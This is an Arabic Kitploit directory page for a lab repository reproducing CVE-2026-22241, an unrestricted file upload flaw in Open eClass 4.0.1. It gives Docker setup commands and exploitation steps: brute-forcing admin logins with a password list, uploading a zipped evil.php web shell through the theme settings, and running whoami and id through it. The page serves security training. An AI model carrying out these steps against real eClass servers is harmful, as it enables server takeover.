Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22241 — بيئة مختبر لـ CVE-2026-22241 | Kitploit
أدوات/GitHubGitHub/cves-labs/cve-2026-22241
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

بيئة مختبر لـ CVE-2026-22241

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-22241

بيئة مختبر لـ CVE-2026-22241

وصف الثغرة:

  • الثغرة: رفع ملف غير مقيد من نوع خطير.
  • التأثير: تنفيذ التعليمات البرمجية عن بُعد (RCE).
  • الوصف: تسمح هذه الثغرة لمهاجم يتمتع بصلاحيات إدارية برفع ملف PHP ضار (Web Shell)، مما يؤدي إلى اختراق كامل لسلامة وأمان خادم الويب.
  • النظام المستهدف: البنية التحتية التعليمية OpenClass.

1. بناء البيئة

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

افتح https://www.openeclass.org/en/previous-versions/ وقم بتنزيل openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

صورة

2. استغلال الثغرة:

لقائمة المفاتيح في ZAP (هجوم القوة العمياء): https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

في صفحة eclass: اذهب إلى أداة المسؤول -> إعدادات السمة -> ثم قم برفع poc.zip

في صفحة جديدة:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id

تنزيل الأداة